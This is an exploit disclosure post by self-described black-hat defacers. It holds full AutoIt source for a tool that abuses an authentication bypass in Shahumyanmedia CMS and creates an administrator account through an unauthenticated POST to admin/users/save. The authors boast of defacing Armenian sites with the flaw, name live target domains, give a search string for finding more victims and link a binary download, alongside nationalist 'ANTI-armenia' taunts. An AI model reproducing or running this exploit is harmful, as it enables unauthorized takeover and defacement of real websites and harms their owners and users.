========================================================
    Vulnerable Software: Shahumyanmedia CMS © 2010 Shahumyan Media
    Official site: http://shahumyanmedia.com/
    ========================================================
    First we want to say: it is not so widely used cms.Only .am (30-40) sites uses it.
    This cms also is commercial.
    This cms is prone to Authentication Bypass vulnerability and we used it to deface this .am sites.(BTW, nice 0day xD)
    But now we are going to 0day it and we will disclosure exploit for it which is written by us too as we promice to @itsec guy. ha ha ha))))))
    The exploit is written in AutoIT programming/scripting language.
    *In some cases it may not work for you even target site vulnerable*
    This isn't our fault.It is due UDF called winhttp component a bit buggie) But it is really nice UDF.
    Anyways, if you want successfull exploitation use PPoE connection and it will work for you.
    You can find binary of exploit (32 bit and 64 bit) in archive + source code of exploit also included.
    On successfull exploitation it will add new administrative account to target site.
    We will also disclosure "Demo" sites to reproduce exploitation.
     
    ENjoy)
     
    /AkaStep & BOT_25
    ========================================================
    Source code of Exploit:
     
    NOTE: Exploit was tested on Win XP SP2 machine against real sites.
    Works for me like charm.
     
    Print screen 1: http://s017.radikal.ru/i434/1207/44/a3737fb99fab.png
     
    Print Screen 2: http://s56.radikal.ru/i151/1207/db/6916d93618a3.png
     
     
    =====================BEGIN==============================
    #NoTrayIcon
    #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
    #AutoIt3Wrapper_Version=beta
    #AutoIt3Wrapper_Icon=best.ico
    #AutoIt3Wrapper_Outfile=shpoc32.exe
    #AutoIt3Wrapper_Outfile_x64=shpoc64.exe
    #AutoIt3Wrapper_UseUpx=n
    #AutoIt3Wrapper_Compile_Both=y
    #AutoIt3Wrapper_UseX64=y
    #AutoIt3Wrapper_Res_Comment=AkaStep & BOT_25
    #AutoIt3Wrapper_Res_Description=AkaStep & BOT_25
    #AutoIt3Wrapper_Res_Fileversion=3.1.6.1
    #AutoIt3Wrapper_Res_LegalCopyright=AkaStep & BOT_25
    #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
    #include <ButtonConstants.au3>
    #include <EditConstants.au3>
    #include <GUIConstantsEx.au3>
    #include <GuiStatusBar.au3>
    #include <StaticConstants.au3>
    #include <WindowsConstants.au3>
    #include "WinHttp.au3"
    #include <String.au3>
    #cs
     
    This Is a Private Exploit against shahumyanmedia cms.
    But for now after a lot of defacement of .am sites we think we can disclosure it.
     
    On success exploiting it will add new administrator to target site.
    Vuln type: Authentication Bypass.
    VUln anD Exploit Discovered By *AkaStep & BOT_25*
     
    Shoutz to All Azerbaijan Black Hatz!
     
    *Azerbaycana + Turk Qardaslarimiza Atesli Salamlar!*
     
    23 July 2012
     
     
    Demo 1: www.eurovision.am
    Demo 2: safecity.am
     
    And Google for "© 2010 Shahumyan Media"
    admin page: eurovision.am/admin/
     
     
     
     
    #ce
     
     
    $Form1 = GUICreate("shahumyanmedia cms Auth Bypass Exploit", 414, 292, -1, -1)
    GUISetBkColor(0x000000)
    $Input1 = GUICtrlCreateInput("0dayforyou", 184, 136, 137, 21)
    GUICtrlSetLimit(-1,30)
    $Input2 = GUICtrlCreateInput("0dayforyou", 184, 176, 137, 21)
    GUICtrlSetLimit(-1,30)
    $Label1 = GUICtrlCreateLabel("Username", 80, 136, 76, 25, $SS_CENTER)
    GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
    GUICtrlSetColor(-1, 0xFF0000)
    $Label2 = GUICtrlCreateLabel("Password", 80, 176, 74, 25, $SS_CENTER)
    GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
    GUICtrlSetColor(-1, 0xFF0000)
    $Exploit = GUICtrlCreateButton("Exploit", 24, 224, 153, 25)
     
    $Label3 = GUICtrlCreateLabel("Target Site", 80, 96, 88, 17)
     
    GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif")
    GUICtrlSetColor(-1, 0xFF0000)
    $Input3 = GUICtrlCreateInput("site.tld", 184, 96, 137, 21)
    GUICtrlSetLimit(-1,30)
    $About = GUICtrlCreateButton("About", 224, 224, 177, 25)
    $StatusBar1 = _GUICtrlStatusBar_Create($Form1)
    _GUICtrlStatusBar_SetMinHeight($StatusBar1, 25)
    _GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
    $Label4 = GUICtrlCreateLabel("0day From Azerbaijan Black Hatz", 24, 24, 362, 36, $SS_CENTER)
    GUICtrlSetFont(-1, 14, 400, 0, "MS Sans Serif")
    GUICtrlSetColor(-1, 0xFF0000)
    $Group1 = GUICtrlCreateGroup("", 8, 8, 401, 201)
    GUICtrlCreateGroup("", -99, -99, 1, 1)
    GUISetState(@SW_SHOW)
     
     
     
     
     
     
     
     
     
    While 1
            $nMsg = GUIGetMsg()
            Switch $nMsg
                    Case $GUI_EVENT_CLOSE
                            $uzanmusdunda_niye_bele_tez_gedirsen=MsgBox(262209,"","Exit?")
                            if $uzanmusdunda_niye_bele_tez_gedirsen=1 Then
                                    MsgBox(262208,"","Ok...Byee)",10)
                            Exit
     
                    EndIf
     
                    Case $Exploit
    GUICtrlSetState($Exploit,$GUI_DISABLE)
     
                            $askforuniquename=MsgBox(262209,"","Before Proceeding make Sure you are using Unique" & @CRLF & "and Not Existent User name on target site" & @CRLF & _
                            "Otherwise Exploit may fail for you" & @CRLF & _
                            "Are you Ready?")
     
                            If $askforuniquename=1 Then
     
    _GUICtrlStatusBar_SetText($StatusBar1,'Working... Please Wait...')
    Sleep(Random(1000,1800,1)); # Some random sleep.
     
    $targetsite=GUICtrlRead($Input3)
    $adduser=GUICtrlRead($Input1)
    $addpass=GUICtrlRead($Input2)
     
     
    blackexploit($targetsite,$adduser,$addpass); passing it to function.
     
    Else
            GUICtrlSetState($Exploit,$GUI_ENABLE)
     
     
     
    EndIf
     
    Case $About
            GUICtrlSetState($About,$GUI_DISABLE)
     
    $creditstoAzerbaijan_blackhatz="This exploit Coded By AkaStep." & @CRLF & _
    "The vulnerability Discovered By BOT_25~AkaStep" & @CRLF & "Hope You Will Enjoy while Using It) Meh Meh))))" & @CRLF &  "Also Special Respect to My Bro CAMO." & @CRLF & '     WwW.ANTI-armenia.ORG     '
     
     
     
    MsgBox(262208,"",$creditstoAzerbaijan_blackhatz);
    GUICtrlSetState($About,$GUI_ENABLE)
     
            EndSwitch
    WEnd
     
     
    Func blackexploit($targetsite,$adduser,$addpass)
     
    _GUICtrlStatusBar_SetText($StatusBar1,'Opening Connection to Target Site... Please Wait...')
    Sleep(Random(1000,1800,1)); # Some random sleep.
    #cs
    Begin Send Data
    #ce
     
     
    $triggerforsuccess='{"result":1,"message":""}'
     
    $bad1='http://'
    $bad2='/'
     
    $targetsite=StringReplace(StringReplace($targetsite,$bad1,''),'/','');# Some CLeanup #
     
     
     
     
     
    Global $sAddress = $targetsite
     
    $rndstr=Random(156788111,54614128,1) & '@pipi.tld'; xD
    $rndmail=$rndstr
     
     
    ;~ Payload to add administrative user. ;~ #
    Global $sPostData = "username=" & $adduser  & "&password=" &$addpass & "&email=" & $rndmail &"&user_type_id=1&firstname_en=" & $adduser & "&lastname_en=" & $adduser & "&secondname_en=" & $adduser & "&firstname_am=&lastname_am=&secondname_am=&firstname_ru=&lastname_ru=&secondname_ru=&user_id=0&x-technology=ajax"
     
     
    Global $hOpen = _WinHttpOpen("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2")
     
     
    Global $hConnect = _WinHttpConnect($hOpen, $sAddress)
     
     
    Global $hRequest = _WinHttpOpenRequest($hConnect, _
            "POST", _
            "admin/users/save", _
            Default, _
            Default, _
            "application/json, text/javascript, */*")
     
     
    _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5")
    _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate")
    _WinHttpAddRequestHeaders($hRequest, "DNT: 1")
    _WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300")
    _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive")
    _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded; charset=UTF-8")
    _WinHttpAddRequestHeaders($hRequest, "X-Requested-With: XMLHttpRequest")
     
     
     
     
    _WinHttpSendRequest($hRequest, -1, $sPostData)
     
    _WinHttpReceiveResponse($hRequest)
     
    Global $sHeader, $sReturned
    If _WinHttpQueryDataAvailable($hRequest) Then
        $sHeader = _WinHttpQueryHeaders($hRequest)
        Do
            $sReturned &= _WinHttpReadData($hRequest)
        Until @error
    ;success or fail
            if StringInStr($sReturned,$triggerforsuccess) Then
       GUICtrlSetState($Exploit,$GUI_ENABLE)
     
                    $tolog="Target Site is Vulnerable and exploiting of Vulnerability was Successfull!" & @CRLF & _
                    _StringRepeat('-',30) & @CRLF & _
                    'Login Page: ' & $targetsite & '/admin/' & @CRLF & _
                    'Your Administrative User: ' & $adduser & @CRLF & _
                    'PassWord: ' & $addpass & @CRLF & _
           _StringRepeat('-',30) & @CRLF & 'Enjoy:)'
     
    _GUICtrlStatusBar_SetText($StatusBar1,'Exploit Was Successfull!')
    Sleep(300);
               FileWrite(@ScriptDir & "\exploitlog.txt",@CRLF & $tolog & @CRLF)
               MsgBox(262208,"Exploited!", $tolog)
     
               _GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
     
    Else
            GUICtrlSetState($Exploit,$GUI_ENABLE)
     
    _GUICtrlStatusBar_SetText($StatusBar1,'Exploit Failed...')
     
    MsgBox(262192,"Exploit Failed:(","Seems Target Site is not vulnerable...");
    _GUICtrlStatusBar_SetText($StatusBar1,'Idle...')
     
                    EndIf
     
     
     
    Else
            _GUICtrlStatusBar_SetText($StatusBar1,'WTF?')
        MsgBox(262192, "Error!", "No internet Connection or Incorrect Domain Name?.")
            _GUICtrlStatusBar_SetText($StatusBar1,'')
            GUICtrlSetState($Exploit,$GUI_ENABLE)
    EndIf
    _WinHttpCloseHandle($hRequest)
    _WinHttpCloseHandle($hConnect)
    _WinHttpCloseHandle($hOpen)
     
     
     
     
     
     
     
    #cs
    End SEND DATA
    #ce
     
    EndFunc; => blackexploit()
     
    =====================END OF============================
     
    Binary && src you will find in attachment named:  0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
     
    MD5 SUM:
    =======================================================
    $ md5sum 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
    4cb562fc1fa839e50ea8b6462967ea01 *0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip
    =======================================================
    http://www.boxca.com/yqwn8h4mhub0/0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip.html
     
     
    ********************* AZERBAIJAN BLACK HATZ***********************************
    Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL:
    ===========================================================
    packetstormsecurity.org
    packetstormsecurity.com
    packetstormsecurity.net
    securityfocus.com
    cxsecurity.com
    security.nnov.ru
    securtiyvulns.com
    securitylab.ru
    1337day.com
    secunia.com
    securityhome.eu
    exploitsdownload.com
    exploit-db.com
    to all AA Team + to all Azerbaijan Black HatZ +
          *Especially to my bro CAMOUFL4G3.*
    ===========================================================
     
    Thanks & Respect!
     
    /AkaStep & BOT_25